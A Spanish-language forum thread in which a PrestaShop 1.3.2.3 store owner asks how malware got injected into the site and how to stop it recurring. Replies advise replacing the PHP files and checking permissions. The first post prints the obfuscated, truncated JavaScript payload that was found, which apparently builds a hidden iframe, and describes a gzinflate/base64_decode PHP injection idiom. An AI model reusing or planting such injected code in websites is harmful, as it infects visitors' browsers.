Baskeyfield Posted April 13, 2012 Share Posted April 13, 2012 Hola a todos, Os comento el problema que tengo. Al acceder a mi Prestashop (Version 1.3.2.3) desde Chrome he recibido una advertencia de que el sitio contenía malware. Tras acceder a Google Webmaster, me ha notificado que se había encontrado en mi comercio las siguientes sentencias: <script>c=3-1;i=-2+c;if(parseInt("0"+"1"+"2"+"3")===83)try{B oolean()["prototype"].q}catch(egewgsd){if(window.document)f= ['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i6 8i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60 i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0 i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60 i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i6 9i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i64i57i67i67i57i 82i6i74i77i7i59i71i77i70i76i16i6i72i64i72i-1i-8i79i65i60i76i 64i21i-1i9i8i-1i-8i64i61i65i63i64i76i21i-1i9i8i-1i-8i75i76i8 1i68i61i21i-1i78i65i75i65i58i65i68i65i76i81i18i64i65i60i60i6 1i70i19i72i71i75i65i76i65i71i70i18i57i58i75i71i68i77i76i61i1 9i68i61i62i76i18i8i19i76i71i72i18i8i19i-1i22i20i7i65i62i74i5 7i69i61i22i-6i1i19i-27i-31i-31i85i-27i-31i-31i62i77i70i59i76 i65i71i70i-8i65i62i74i57i69i61i74i0i1i83i-27i-31i-31i-31i78i 57i74i-8i62i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i7 6i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i62i 6i75 Revisando las fechas de modificación del servidor, he comprobado que la inyección se encontraba en 3 php: footer, header e index. La inyección era algo asi: echo(gzinflate(base64_decode("2034234... etc."))) Mis pregunta es: ¿Cómo han conseguido inyectar ese código? ¿Cómo evitar que vuelva a repetirse? Gracias por vuestra ayuda. Saludos. Link to comment Share on other sites More sharing options...
shacker Posted April 13, 2012 Share Posted April 13, 2012 es un bug de esa version. reemplaza los archivos, y no des permisos 777 a los archivos tpl de tu template o htaccess Link to comment Share on other sites More sharing options...
Baskeyfield Posted April 14, 2012 Author Share Posted April 14, 2012 es un bug de esa version. reemplaza los archivos, y no des permisos 777 a los archivos tpl de tu template o htaccess Gracias por la respuesta, te comento: - Todos los archivos tenían y tienen permisos 644 - Todos los directorios tenían y tienen permisos 755 Sabía que existía un bug, pero afectaba a la versión superior (1.4), que además recuerdo que se mandó un email a todos los usuarios de prestashop, por lo tanto no afectaría a mi versión. Por otro lado, lo que se han infectado son phps, y ese virus infectaba tpls... ¿que puede ser entonces? Muchas gracias. Saludos. Link to comment Share on other sites More sharing options...
shacker Posted April 14, 2012 Share Posted April 14, 2012 puede ser algun otro tipo de virus. te recomiendo reemplazar todos los php por los originales, y ver que el htaccess no tenga permisos 777 Link to comment Share on other sites More sharing options...
Recommended Posts